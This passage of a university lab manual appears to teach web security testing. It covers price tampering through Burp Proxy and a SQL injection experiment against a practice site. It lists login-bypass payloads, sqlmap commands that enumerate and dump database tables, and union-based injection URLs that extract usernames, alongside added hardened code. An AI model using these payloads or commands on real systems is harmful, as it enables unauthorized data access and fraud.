Open vulnerable website :

View product page inspection :

Turn Intercept On and Click Add to Cart to inspect Post Cart Details :

Modify Request (Change Price Money from 1337700 to 1 Dollar ) :

Turn Interception Off and View Shopping Cart to view updated details :

Details of Target :
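The price change made through Burp Proxy above works because the server trusts the price field carried in the intercepted request. As an added example (not code from the lab manual or from the vulnerable site), a cart handler that trusts the client is shown beside one that takes the price from a server-side catalog and refuses a request whose price disagrees with it; the catalog, SKU and request bodies are constructed for the example.

```python
import json
from decimal import Decimal

# Constructed server-side catalog: prices are authoritative here, never in the client.
CATALOG = {"SKU-1337": {"name": "Demo laptop", "price": Decimal("1337.00")}}


class CheckoutError(Exception):
    pass


def add_to_cart_vulnerable(cart, request_body):
    """Trusts the price sent by the client. Anything rewritten in an intercepting
    proxy before the request reaches the server (price lowered to 1) becomes the
    cart's truth."""
    data = json.loads(request_body)
    cart.append({"sku": data["sku"], "qty": int(data["qty"]),
                 "price": Decimal(str(data["price"]))})
    return cart


def add_to_cart_hardened(cart, request_body):
    """Ignores any client-supplied price: the SKU and quantity are validated and the
    price is looked up server-side. A client price that disagrees with the catalog
    is a strong tampering signal, so the request is refused (and should be logged)
    rather than silently corrected."""
    data = json.loads(request_body)
    sku = data.get("sku")
    if sku not in CATALOG:
        raise CheckoutError("unknown product")
    qty = data.get("qty")
    if not isinstance(qty, int) or qty < 1 or qty > 100:
        raise CheckoutError("invalid quantity")
    server_price = CATALOG[sku]["price"]
    if "price" in data and Decimal(str(data["price"])) != server_price:
        raise CheckoutError("price mismatch: client sent %s, catalog says %s"
                            % (data["price"], server_price))
    cart.append({"sku": sku, "qty": qty, "price": server_price})
    return cart


def hardened_rejects(request_body):
    """True when the hardened handler refuses the request."""
    try:
        add_to_cart_hardened([], request_body)
        return False
    except CheckoutError:
        return True


def cart_total(cart):
    return sum(item["price"] * item["qty"] for item in cart)


# Constructed request bodies: one as a proxy user might rewrite it, one untouched.
TAMPERED = json.dumps({"sku": "SKU-1337", "qty": 1, "price": 1})
HONEST = json.dumps({"sku": "SKU-1337", "qty": 2, "price": "1337.00"})

if __name__ == "__main__":
    print("vulnerable total:", cart_total(add_to_cart_vulnerable([], TAMPERED)))
    print("hardened rejects tampered request:", hardened_rejects(TAMPERED))
    print("hardened total  :", cart_total(add_to_cart_hardened([], HONEST)))
```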

Learning Outcomes: The student will be able to

LO1: Understand and simulate Web Security Testing


LO2: Understand the use of Web Security Testing

Course Outcomes: Upon completion of the course students will be able to understand and
simulate Web Security Testing

Conclusion: After performing this Experiment, we understood how to simulate Web
Security testing and the use of Web Security testing. We intercepted the vulnerable website
and also modified the request by intercepting it and changing its content before passing it on
to the server.

For Faculty Use

Parameters     | Correction [40%] | Formative Assessment [40%] | Timely completion of Practical | Attendance / Learning Attitude [20%]
Marks Obtained |                  |                            |                                |

Experiment no. 8

Aim: Simulation of SQL Injection Attack

Objectives: To understand about SQL Injection Attack

Outcomes: The learner will be able to understand and simulate SQL Injection Attack

Hardware / Software Required: Unix/Linux, SQLmap

Theory:

SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious
SQL statements (also commonly referred to as a malicious payload) that control a web
application’s database server (also commonly referred to as a Relational Database
Management System – RDBMS). Since an SQL injection vulnerability could possibly affect
any website or web application that makes use of an SQL-based database, the vulnerability is
one of the oldest, most prevalent and most dangerous of web application vulnerabilities.

By leveraging an SQL injection vulnerability, given the right circumstances, an attacker can
use it to bypass a web application’s authentication and authorization mechanisms and
retrieve the contents of an entire database. SQL injection can also be used to add, modify and
delete records in a database, affecting data integrity.

As a result, SQL injection can provide an attacker with unauthorized access to
sensitive data, including customer data, personally identifiable information (PII), trade
secrets, intellectual property and other sensitive information.

How SQL Injection works

In order to run malicious SQL queries against a database server, an attacker must first find
an input within the web application that is included inside an SQL query.

In order for an SQL injection attack to take place, the vulnerable website needs to directly
include user input within an SQL statement. An attacker can then insert a payload that will
be included as part of the SQL query and run against the database server.



The following server-side pseudo-code is used to authenticate users to the web application.

# Define POST variables
uname = request.POST['username']
passwd = request.POST['password']

# SQL query vulnerable to SQLi
sql = "SELECT id FROM users WHERE username='" + uname + "' AND password='" + passwd + "'"

# Execute the SQL statement
database.execute(sql)

The above script is a simple example of authenticating a user with a username and a password
against a database with a table named users, and a username and password column.

The above script is vulnerable to SQL injection because an attacker could submit malicious
input in such a way that would alter the SQL statement being executed by the database server.

A simple example of an SQL injection payload could be something as simple as setting the
password field to password' OR 1=1.

This would result in the following SQL query being run against the database server.

SELECT id FROM users WHERE username='username' AND password='password' OR 1=1'

An attacker can also comment out the rest of the SQL statement to control the execution of the
SQL query further.



-- MySQL, MSSQL, Oracle, PostgreSQL, SQLite
' OR '1'='1' --
' OR '1'='1' /*
-- MySQL
' OR '1'='1' #
-- Access (using null characters)
' OR '1'='1' %00
' OR '1'='1' %16

Once the query executes, the result is returned to the application to be processed, resulting
in an authentication bypass. If authentication bypass is possible, the application will most
likely log the attacker in with the first account from the query result; the first account in a
database is usually an administrative user.
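As an added example (not from the lab manual), the vulnerable pseudo-code above is rebuilt against a constructed in-memory SQLite users table and placed beside a parameterized query: the comment-out payload from the list above bypasses the concatenated query but not the parameterized one, and the dangling quote left by the first payload (password' OR 1=1) produces a syntax error instead of a bypass. The table contents and the use of sqlite3 as a stand-in for the lab's RDBMS are assumptions.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the lab's users table (assumption:
    columns id, username, password; the administrative account has id 1)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret-admin"), (2, "alice", "alice-pass")])
    conn.commit()
    return conn

def build_vulnerable_sql(uname, passwd):
    """Same construction as the pseudo-code: input concatenated into the query."""
    return ("SELECT id FROM users WHERE username='" + uname +
            "' AND password='" + passwd + "'")

def login_vulnerable(conn, uname, passwd):
    """Executes the concatenated string; returns the first matching id or None."""
    row = conn.execute(build_vulnerable_sql(uname, passwd)).fetchone()
    return row[0] if row else None

def login_parameterized(conn, uname, passwd):
    """Hardened form: placeholders pass the input as data, never as SQL syntax."""
    row = conn.execute("SELECT id FROM users WHERE username=? AND password=?",
                       (uname, passwd)).fetchone()
    return row[0] if row else None

def vulnerable_query_errors(conn, uname, passwd):
    """True if the concatenated query is malformed (e.g. an unbalanced quote)."""
    try:
        conn.execute(build_vulnerable_sql(uname, passwd))
        return False
    except sqlite3.OperationalError:
        return True

if __name__ == "__main__":
    conn = make_db()
    bypass = "' OR '1'='1' -- "          # comment-out payload listed above
    print(build_vulnerable_sql("guest", bypass))
    print("concatenated :", login_vulnerable(conn, "guest", bypass))      # 1 (admin)
    print("parameterized:", login_parameterized(conn, "guest", bypass))   # None
    # The manual's first payload leaves a dangling quote, so the engine rejects it
    print("dangling quote errors:", vulnerable_query_errors(conn, "username", "password' OR 1=1"))
```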

To check whether the website is vulnerable, replace the value of the GET request parameter with
an asterisk (*):

http://testphp.vulnweb.com/listproducts.php?cat=*

If this results in an error such as the error given below, then we can say that the website is
vulnerable.



SQLMAP: sqlmap is an open source penetration testing tool that automates the process of
detecting and exploiting SQL injection flaws and taking over database servers. It comes
with a powerful detection engine, many niche features for the penetration tester
and a broad range of switches ranging from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing commands on the
operating system via out-of-band connections.

Step 1: Installation of sqlmap

$ sudo apt-get install sqlmap

Step 2: List information about the existing databases

To check access to a database, the --dbs option can be used. --dbs lists all the available
databases.

It reports the vulnerability in parameter cat, the various payloads executed, the name of the backend
database, its version and the list of all available databases. Here, two databases, acuart and
information_schema, are listed.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs



Step 3: Listing tables present in a database

Each database can be further explored to get information about its tables. Option -D
can be used to specify the name of the database we need to explore. If access to the database
is allowed, we can list the tables using the --tables option along with the name of the database. Here,
the acuart database is accessed and all available tables in that database are listed as the output of
the following command.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

Step 4: List column information of a particular table

Columns of a particular table can be viewed by specifying the -T option before the table name and
the --columns option to query the column names. Access to the table and its columns for the table
"products" is displayed by the following command.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products --columns

Step 5: Dump the data from the columns

Information from a specific column can be retrieved and displayed using -C. Multiple
columns can also be listed, separated by commas, and the --dump option retrieves the data.
The following command shows all values of the column name from the products table of the
acuart database.

$ sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T products -C name --dump



Output:

Implementation:

Open the targeted URL given below in the browser:

http://testphp.vulnweb.com/artists.php?artist=1

Use the ORDER BY keyword to sort the records in ascending or descending order for id=1:

http://testphp.vulnweb.com/artists.php?artist=1 order by 1



Go further using a union-based injection to select statements from a different table:

http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

Fetch the name of the database:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3



Extract the current username as well as the version of the database system:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),current_user()

Fetch a table name inside the database:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1



http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

The concat function (here MySQL's group_concat) is used to concatenate two or more strings into a single string.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()



Use the concat function to select uname from the table users by executing the following
query through the URL:

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(uname),3 from users

Learning Outcomes: The student will be able to

LO1: Understand and simulate SQL Injection Attack


LO2: Understand the effects of SQL Injection Attack

Course Outcomes: Upon completion of the course students will be able to understand and
simulate SQL Injection Attack

Conclusion: After performing this Experiment, we understood how to simulate SQL
Injection Attack and the different effects of SQL Injection Attack.



For Faculty Use

Correction Parameters | Formative Assessment [40%] | Timely completion of Practical [40%] | Attendance / Learning Attitude [20%]
Marks Obtained        |                            |                                      |

